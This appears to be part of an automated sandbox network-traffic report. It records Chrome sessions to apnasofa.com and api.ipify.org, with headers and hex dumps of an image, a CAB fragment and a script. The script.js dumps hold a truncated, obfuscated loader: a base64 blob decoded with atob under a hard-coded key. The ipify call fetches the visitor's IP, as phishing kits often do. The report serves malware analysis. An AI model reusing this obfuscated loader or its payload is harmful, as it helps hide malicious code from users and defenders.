                                                          2024-12-02 16:55:23 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                          Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                          2024-12-02 16:55:23 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                          Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          8192.168.2.449758103.160.107.1384437380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:55:23 UTC604OUTGET /episode/image/logo.png HTTP/1.1
                                                          Host: apnasofa.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: image
                                                          Referer: https://apnasofa.com/episode/index
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-12-02 16:55:24 UTC1030INHTTP/1.1 200 OK
                                                          Connection: close
                                                          cache-control: public, max-age=31536000
                                                          expires: Tue, 02 Dec 2025 16:55:24 GMT
                                                          content-type: image/png
                                                          last-modified: Thu, 28 Nov 2024 06:32:18 GMT
                                                          accept-ranges: bytes
                                                          content-length: 21327
                                                          date: Mon, 02 Dec 2024 16:55:24 GMT
                                                          server: LiteSpeed
                                                          x-xss-protection: 1; mode=block
                                                          x-frame-options: SAMEORIGIN
                                                          x-content-type-options: nosniff
                                                          strict-transport-security: max-age=31536000; includeSubDomains
                                                          referrer-policy: strict-origin-when-cross-origin
                                                          permissions-policy: geolocation=self
                                                          content-security-policy: default-src 'self' https: data: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; img-src 'self' data: https: *;
                                                          x-permitted-cross-domain-policies: none
                                                          feature-policy: camera 'none'; microphone 'none'; geolocation 'self'
                                                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                          2024-12-02 16:55:24 UTC338INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 07 4f 00 00 01 34 08 06 00 00 00 44 9d 7b b3 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 52 dc 49 44 41 54 78 da ec dd 4b 72 1b 49 da 20 5a af b2 1c 37 d5 2b 20 ea 6e 80 ac 15 10 39 e9 1e 92 35 6f 33 22 57 20 a6 71 01 82 16 40 4b e6 0a 14 32 eb 79 51 c3 be 93 04 57 50 e4 06 ba c0 15 94 78 37 f0 df 70 d0 91 82 28 3e 40 12 08 77 8f 38 c7 2c 0c 59 59 29 21 e0 8f 08 77 ff fc 11 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 37 7f 79 ea ff fc ff 8e fe 9f f3 f6 63 5f 32 f1 52 ff ed e2 ff 8e 5f f3 e7 3e fc bf 61 d2 7e 4c a4 20 af d0
                                                          Data Ascii: PNGIHDRO4D{pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<RIDATxKrI Z7+ n95o3"W q@K2yQWPx7p(>@w8,YY)!w7yc_2R_>a~L
                                                          2024-12-02 16:55:24 UTC14994INData Raw: 00 00 00 00 41 f0 14 00 00 00 00 00 00 60 41 f0 14 00 00 00 00 00 00 20 08 9e 02 00 00 00 00 00 00 2c 08 9e 02 00 00 00 00 00 00 04 c1 53 00 00 00 00 00 00 80 05 c1 53 00 00 00 00 00 00 80 20 78 0a 00 00 00 00 00 00 b0 20 78 0a 00 00 00 00 00 00 10 04 4f 01 00 00 00 00 00 00 16 04 4f 01 00 00 00 00 00 00 82 e0 29 00 00 00 00 00 00 c0 82 e0 29 00 00 00 00 00 00 40 10 3c 05 00 00 00 00 00 00 58 10 3c 05 00 00 00 00 00 00 08 82 a7 00 00 00 00 00 00 00 0b 82 a7 00 00 00 00 00 00 00 41 f0 14 00 00 00 00 00 00 60 41 f0 14 00 00 00 00 00 00 20 08 9e 02 00 00 00 00 00 00 2c 08 9e 02 00 00 00 00 00 00 04 c1 53 00 00 00 00 00 00 80 05 c1 53 00 00 00 00 00 00 80 20 78 0a 00 00 00 00 00 00 b0 20 78 0a 00 00 00 00 00 00 10 04 4f 01 00 00 00 00 00 00 16 04 4f 01 00 00
                                                          Data Ascii: A`A ,SS x xOO))@<X<A`A ,SS x xOO
                                                          2024-12-02 16:55:24 UTC5995INData Raw: dd 7a 7f 92 b3 bc a4 5d b1 e8 a6 4d f6 ae 84 67 c4 3a 79 2e 78 0a 00 6f d7 b7 40 e3 6d 30 b8 43 47 d2 39 76 a5 0c 82 37 72 84 02 95 f0 3c de 4b b3 c1 87 62 2a df 8b 7e 6f 7c ed c1 f3 7a 56 c0 3d c4 01 d8 21 4d 8c 98 a8 d7 14 cc f1 11 f4 c6 40 ce 8d cf d9 87 9d f6 6d f2 53 9a e0 74 38 f0 76 d9 90 9c 84 bc ab 8c d7 ce 73 c1 53 00 78 a3 b4 fd d6 75 8f 7e d2 85 ad 02 e9 ba cc 15 72 1f 07 6d c7 ed 44 76 a0 7e 3c 68 10 3b 12 a4 55 a7 07 99 6f e3 da ec f7 67 35 ea f5 46 0c 62 f5 69 1a 94 cd fd 7e bf 4d 13 c6 e0 21 82 a7 f4 49 15 db 71 be 45 e6 1d c8 76 43 ff 26 3f 4d b5 cb 86 a1 90 36 d9 da 79 2e 78 0a 00 9b 71 ee b7 40 2f 3a 2b 53 db f7 52 92 34 41 e7 a6 80 5b 89 67 9f 4e 07 90 e4 25 fc c6 46 c9 af a6 5e bc f6 fe 73 9e 97 b6 6a 28 67 7e 4f 43 fe 15 0e 06 66 79
                                                          Data Ascii: z]Mg:y.xo@m0CG9v7r<Kb*~o|zV=!M@mSt8vsSxu~rmDv~<h;Uog5Fbi~M!IqEvC&?M6y.xq@/:+SR4A[gN%F^sj(g~OCfy


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          9192.168.2.449759103.160.107.1384437380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:55:23 UTC539OUTGET /episode/script.js HTTP/1.1
                                                          Host: apnasofa.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: */*
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: script
                                                          Referer: https://apnasofa.com/episode/index
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-12-02 16:55:24 UTC1066INHTTP/1.1 200 OK
                                                          Connection: close
                                                          cache-control: public, max-age=2592000
                                                          expires: Wed, 01 Jan 2025 16:55:24 GMT
                                                          content-type: text/javascript
                                                          last-modified: Thu, 28 Nov 2024 14:11:15 GMT
                                                          accept-ranges: bytes
                                                          content-length: 8831
                                                          date: Mon, 02 Dec 2024 16:55:24 GMT
                                                          server: LiteSpeed
                                                          x-xss-protection: 1; mode=block
                                                          x-frame-options: SAMEORIGIN
                                                          x-content-type-options: nosniff
                                                          strict-transport-security: max-age=31536000; includeSubDomains
                                                          referrer-policy: strict-origin-when-cross-origin
                                                          permissions-policy: geolocation=self
                                                          content-security-policy: default-src 'self' https: data: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; img-src 'self' data: https: *;
                                                          x-permitted-cross-domain-policies: none
                                                          feature-policy: camera 'none'; microphone 'none'; geolocation 'self'
                                                          access-control-allow-origin: *
                                                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                          2024-12-02 16:55:24 UTC302INData Raw: 76 61 72 20 6b 65 79 20 3d 20 22 73 65 63 72 65 74 6b 65 79 22 3b 0a 76 61 72 20 73 63 72 69 70 74 20 3d 20 61 74 6f 62 28 22 46 77 6f 41 42 77 67 52 42 52 46 58 45 67 45 48 4e 78 4d 52 42 52 45 31 47 68 59 58 46 77 73 52 47 55 31 65 4e 79 6f 75 4d 51 6f 61 48 77 41 58 42 79 6b 4d 45 77 45 52 44 30 4a 56 55 30 31 4b 55 6c 68 4b 53 78 35 7a 55 30 55 50 46 78 46 55 43 68 41 4e 48 41 49 52 45 77 63 57 44 67 45 38 48 67 51 4b 48 6b 56 4a 53 30 4a 65 53 47 39 44 55 67 59 62 42 52 59 4e 55 77 77 51 50 77 6f 57 41 67 6b 63 55 31 68 44 58 51 77 6b 41 77 6f 58 46 68 6b 4b 49 67 51 51 46 77 77 70 48 41 45 66 4d 77 73 51 47 51 6f 51 46 30 6f 4b 58 42 45 52 47 42 46 52 48 51 51 56 47 77 49 56 48 77 6f 4c 58 52 41 51 46 78 63 31 44 41 41 58 42 30 78 59 65 47 39 55 53
                                                          Data Ascii: var key = "secretkey";var script = atob("FwoABwgRBRFXEgEHNxMRBRE1GhYXFwsRGU1eNyouMQoaHwAXBykMEwERD0JVU01KUlhKSx5zU0UPFxFUChANHAIREwcWDgE8HgQKHkVJS0JeSG9DUgYbBRYNUwwQPwoWAgkcU1hDXQwkAwoXFhkKIgQQFwwpHAEfMwsQGQoQF0oKXBERGBFRHQQVGwIVHwoLXRAQFxc1DAAXB0xYeG9US
                                                          2024-12-02 16:55:24 UTC8529INData Raw: 42 41 74 5a 46 41 41 58 4e 77 67 56 41 67 6b 2f 41 51 6f 4f 4a 7a 63 34 51 30 78 5a 43 47 39 44 55 6b 56 55 53 30 55 61 48 41 73 51 42 6b 55 63 43 68 59 52 55 31 68 44 42 51 77 61 44 77 6f 4f 58 51 6b 4d 45 51 51 41 41 67 6f 58 58 51 30 43 41 51 31 61 47 42 41 62 41 42 45 52 47 77 73 54 51 31 52 51 53 47 39 44 55 6b 56 55 53 30 55 51 46 55 56 4c 55 77 30 56 47 41 31 51 55 78 63 47 42 68 41 47 42 55 56 65 56 46 35 70 55 6b 56 55 53 30 56 5a 42 78 63 61 55 68 35 2b 53 30 56 5a 55 30 56 44 55 6b 56 55 53 78 63 63 42 78 41 52 48 45 55 56 48 77 6f 62 57 77 30 43 41 51 31 64 55 47 39 5a 55 30 56 44 55 6b 55 4a 53 77 59 59 42 77 59 4c 55 6b 30 52 51 6b 55 43 65 55 56 44 55 6b 56 55 53 30 56 5a 55 30 55 52 46 78 45 42 47 51 74 5a 56 45 4a 59 65 45 56 55 53 30 56
                                                          Data Ascii: BAtZFAAXNwgVAgk/AQoOJzc4Q0xZCG9DUkVUS0UaHAsQBkUcChYRU1hDBQwaDwoOXQkMEQQAAgoXXQ0CAQ1aGBAbABERGwsTQ1RQSG9DUkVUS0UQFUVLUw0VGA1QUxcGBhAGBUVeVF5pUkVUS0VZBxcaUh5+S0VZU0VDUkVUSxccBxARHEUVHwobWw0CAQ1dUG9ZU0VDUkUJSwYYBwYLUk0RQkUCeUVDUkVUS0VZU0URFxEBGQtZVEJYeEVUS0V


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          10192.168.2.449762104.26.12.2054437380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:55:26 UTC547OUTGET /?format=json HTTP/1.1
                                                          Host: api.ipify.org
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: */*
                                                          Origin: https://apnasofa.com
                                                          Sec-Fetch-Site: cross-site
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Referer: https://apnasofa.com/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-12-02 16:55:26 UTC463INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:55:26 GMT
                                                          Content-Type: application/json
                                                          Content-Length: 21
                                                          Connection: close
                                                          Access-Control-Allow-Origin: *
                                                          Vary: Origin
                                                          CF-Cache-Status: DYNAMIC
                                                          Server: cloudflare
                                                          CF-RAY: 8ebcd8355d178cb3-EWR
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2043&min_rtt=2027&rtt_var=772&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=1125&delivery_rate=1440552&cwnd=219&unsent_bytes=0&cid=0ad274703fb69b68&ts=476&x=0"
                                                          2024-12-02 16:55:26 UTC21INData Raw: 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 7d
                                                          Data Ascii: {"ip":"8.46.123.228"}


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          11192.168.2.449764103.160.107.1384437380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:55:26 UTC353OUTGET /episode/script.js HTTP/1.1
                                                          Host: apnasofa.com
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-12-02 16:55:27 UTC1066INHTTP/1.1 200 OK
                                                          Connection: close
                                                          cache-control: public, max-age=2592000
                                                          expires: Wed, 01 Jan 2025 16:55:27 GMT
                                                          content-type: text/javascript
                                                          last-modified: Thu, 28 Nov 2024 14:11:15 GMT
                                                          accept-ranges: bytes
                                                          content-length: 8831
                                                          date: Mon, 02 Dec 2024 16:55:27 GMT
                                                          server: LiteSpeed
                                                          x-xss-protection: 1; mode=block
                                                          x-frame-options: SAMEORIGIN
                                                          x-content-type-options: nosniff
                                                          strict-transport-security: max-age=31536000; includeSubDomains
                                                          referrer-policy: strict-origin-when-cross-origin
                                                          permissions-policy: geolocation=self
                                                          content-security-policy: default-src 'self' https: data: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; img-src 'self' data: https: *;
                                                          x-permitted-cross-domain-policies: none
                                                          feature-policy: camera 'none'; microphone 'none'; geolocation 'self'
                                                          access-control-allow-origin: *
                                                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                          2024-12-02 16:55:27 UTC302INData Raw: 76 61 72 20 6b 65 79 20 3d 20 22 73 65 63 72 65 74 6b 65 79 22 3b 0a 76 61 72 20 73 63 72 69 70 74 20 3d 20 61 74 6f 62 28 22 46 77 6f 41 42 77 67 52 42 52 46 58 45 67 45 48 4e 78 4d 52 42 52 45 31 47 68 59 58 46 77 73 52 47 55 31 65 4e 79 6f 75 4d 51 6f 61 48 77 41 58 42 79 6b 4d 45 77 45 52 44 30 4a 56 55 30 31 4b 55 6c 68 4b 53 78 35 7a 55 30 55 50 46 78 46 55 43 68 41 4e 48 41 49 52 45 77 63 57 44 67 45 38 48 67 51 4b 48 6b 56 4a 53 30 4a 65 53 47 39 44 55 67 59 62 42 52 59 4e 55 77 77 51 50 77 6f 57 41 67 6b 63 55 31 68 44 58 51 77 6b 41 77 6f 58 46 68 6b 4b 49 67 51 51 46 77 77 70 48 41 45 66 4d 77 73 51 47 51 6f 51 46 30 6f 4b 58 42 45 52 47 42 46 52 48 51 51 56 47 77 49 56 48 77 6f 4c 58 52 41 51 46 78 63 31 44 41 41 58 42 30 78 59 65 47 39 55 53
                                                          Data Ascii: var key = "secretkey";var script = atob("FwoABwgRBRFXEgEHNxMRBRE1GhYXFwsRGU1eNyouMQoaHwAXBykMEwERD0JVU01KUlhKSx5zU0UPFxFUChANHAIREwcWDgE8HgQKHkVJS0JeSG9DUgYbBRYNUwwQPwoWAgkcU1hDXQwkAwoXFhkKIgQQFwwpHAEfMwsQGQoQF0oKXBERGBFRHQQVGwIVHwoLXRAQFxc1DAAXB0xYeG9US
                                                          2024-12-02 16:55:27 UTC8529INData Raw: 42 41 74 5a 46 41 41 58 4e 77 67 56 41 67 6b 2f 41 51 6f 4f 4a 7a 63 34 51 30 78 5a 43 47 39 44 55 6b 56 55 53 30 55 61 48 41 73 51 42 6b 55 63 43 68 59 52 55 31 68 44 42 51 77 61 44 77 6f 4f 58 51 6b 4d 45 51 51 41 41 67 6f 58 58 51 30 43 41 51 31 61 47 42 41 62 41 42 45 52 47 77 73 54 51 31 52 51 53 47 39 44 55 6b 56 55 53 30 55 51 46 55 56 4c 55 77 30 56 47 41 31 51 55 78 63 47 42 68 41 47 42 55 56 65 56 46 35 70 55 6b 56 55 53 30 56 5a 42 78 63 61 55 68 35 2b 53 30 56 5a 55 30 56 44 55 6b 56 55 53 78 63 63 42 78 41 52 48 45 55 56 48 77 6f 62 57 77 30 43 41 51 31 64 55 47 39 5a 55 30 56 44 55 6b 55 4a 53 77 59 59 42 77 59 4c 55 6b 30 52 51 6b 55 43 65 55 56 44 55 6b 56 55 53 30 56 5a 55 30 55 52 46 78 45 42 47 51 74 5a 56 45 4a 59 65 45 56 55 53 30 56
                                                          Data Ascii: BAtZFAAXNwgVAgk/AQoOJzc4Q0xZCG9DUkVUS0UaHAsQBkUcChYRU1hDBQwaDwoOXQkMEQQAAgoXXQ0CAQ1aGBAbABERGwsTQ1RQSG9DUkVUS0UQFUVLUw0VGA1QUxcGBhAGBUVeVF5pUkVUS0VZBxcaUh5+S0VZU0VDUkVUSxccBxARHEUVHwobWw0CAQ1dUG9ZU0VDUkUJSwYYBwYLUk0RQkUCeUVDUkVUS0VZU0URFxEBGQtZVEJYeEVUS0V


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          12192.168.2.449766103.160.107.1384437380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:55:26 UTC358OUTGET /episode/image/logo.png HTTP/1.1
                                                          Host: apnasofa.com
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-12-02 16:55:27 UTC1030INHTTP/1.1 200 OK
                                                          Connection: close
                                                          cache-control: public, max-age=31536000
                                                          expires: Tue, 02 Dec 2025 16:55:27 GMT
                                                          content-type: image/png
                                                          last-modified: Thu, 28 Nov 2024 06:32:18 GMT
                                                          accept-ranges: bytes
                                                          content-length: 21327
                                                          date: Mon, 02 Dec 2024 16:55:27 GMT
                                                          server: LiteSpeed
                                                          x-xss-protection: 1; mode=block
                                                          x-frame-options: SAMEORIGIN
                                                          x-content-type-options: nosniff
                                                          strict-transport-security: max-age=31536000; includeSubDomains
                                                          referrer-policy: strict-origin-when-cross-origin
                                                          permissions-policy: geolocation=self
                                                          content-security-policy: default-src 'self' https: data: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; img-src 'self' data: https: *;
                                                          x-permitted-cross-domain-policies: none
                                                          feature-policy: camera 'none'; microphone 'none'; geolocation 'self'
                                                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                          2024-12-02 16:55:27 UTC338INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 07 4f 00 00 01 34 08 06 00 00 00 44 9d 7b b3 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 52 dc 49 44 41 54 78 da ec dd 4b 72 1b 49 da 20 5a af b2 1c 37 d5 2b 20 ea 6e 80 ac 15 10 39 e9 1e 92 35 6f 33 22 57 20 a6 71 01 82 16 40 4b e6 0a 14 32 eb 79 51 c3 be 93 04 57 50 e4 06 ba c0 15 94 78 37 f0 df 70 d0 91 82 28 3e 40 12 08 77 8f 38 c7 2c 0c 59 59 29 21 e0 8f 08 77 ff fc 11 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 37 7f 79 ea ff fc ff 8e fe 9f f3 f6 63 5f 32 f1 52 ff ed e2 ff 8e 5f f3 e7 3e fc bf 61 d2 7e 4c a4 20 af d0
                                                          Data Ascii: PNGIHDRO4D{pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<RIDATxKrI Z7+ n95o3"W q@K2yQWPx7p(>@w8,YY)!w7yc_2R_>a~L
                                                          2024-12-02 16:55:27 UTC14994INData Raw: 00 00 00 00 41 f0 14 00 00 00 00 00 00 60 41 f0 14 00 00 00 00 00 00 20 08 9e 02 00 00 00 00 00 00 2c 08 9e 02 00 00 00 00 00 00 04 c1 53 00 00 00 00 00 00 80 05 c1 53 00 00 00 00 00 00 80 20 78 0a 00 00 00 00 00 00 b0 20 78 0a 00 00 00 00 00 00 10 04 4f 01 00 00 00 00 00 00 16 04 4f 01 00 00 00 00 00 00 82 e0 29 00 00 00 00 00 00 c0 82 e0 29 00 00 00 00 00 00 40 10 3c 05 00 00 00 00 00 00 58 10 3c 05 00 00 00 00 00 00 08 82 a7 00 00 00 00 00 00 00 0b 82 a7 00 00 00 00 00 00 00 41 f0 14 00 00 00 00 00 00 60 41 f0 14 00 00 00 00 00 00 20 08 9e 02 00 00 00 00 00 00 2c 08 9e 02 00 00 00 00 00 00 04 c1 53 00 00 00 00 00 00 80 05 c1 53 00 00 00 00 00 00 80 20 78 0a 00 00 00 00 00 00 b0 20 78 0a 00 00 00 00 00 00 10 04 4f 01 00 00 00 00 00 00 16 04 4f 01 00 00
                                                          Data Ascii: A`A ,SS x xOO))@<X<A`A ,SS x xOO
                                                          2024-12-02 16:55:27 UTC5995INData Raw: dd 7a 7f 92 b3 bc a4 5d b1 e8 a6 4d f6 ae 84 67 c4 3a 79 2e 78 0a 00 6f d7 b7 40 e3 6d 30 b8 43 47 d2 39 76 a5 0c 82 37 72 84 02 95 f0 3c de 4b b3 c1 87 62 2a df 8b 7e 6f 7c ed c1 f3 7a 56 c0 3d c4 01 d8 21 4d 8c 98 a8 d7 14 cc f1 11 f4 c6 40 ce 8d cf d9 87 9d f6 6d f2 53 9a e0 74 38 f0 76 d9 90 9c 84 bc ab 8c d7 ce 73 c1 53 00 78 a3 b4 fd d6 75 8f 7e d2 85 ad 02 e9 ba cc 15 72 1f 07 6d c7 ed 44 76 a0 7e 3c 68 10 3b 12 a4 55 a7 07 99 6f e3 da ec f7 67 35 ea f5 46 0c 62 f5 69 1a 94 cd fd 7e bf 4d 13 c6 e0 21 82 a7 f4 49 15 db 71 be 45 e6 1d c8 76 43 ff 26 3f 4d b5 cb 86 a1 90 36 d9 da 79 2e 78 0a 00 9b 71 ee b7 40 2f 3a 2b 53 db f7 52 92 34 41 e7 a6 80 5b 89 67 9f 4e 07 90 e4 25 fc c6 46 c9 af a6 5e bc f6 fe 73 9e 97 b6 6a 28 67 7e 4f 43 fe 15 0e 06 66 79
                                                          Data Ascii: z]Mg:y.xo@m0CG9v7r<Kb*~o|zV=!M@mSt8vsSxu~rmDv~<h;Uog5Fbi~M!IqEvC&?M6y.xq@/:+SR4A[gN%F^sj(g~OCfy


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          13192.168.2.449765103.160.107.1384437380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:55:26 UTC593OUTGET /favicon.ico HTTP/1.1
                                                          Host: apnasofa.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: image
                                                          Referer: https://apnasofa.com/episode/index
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-12-02 16:55:27 UTC416INHTTP/1.1 404 Not Found
                                                          Connection: close
                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                          pragma: no-cache
                                                          content-type: text/html
                                                          content-length: 1251
                                                          date: Mon, 02 Dec 2024 16:55:27 GMT
                                                          server: LiteSpeed
                                                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
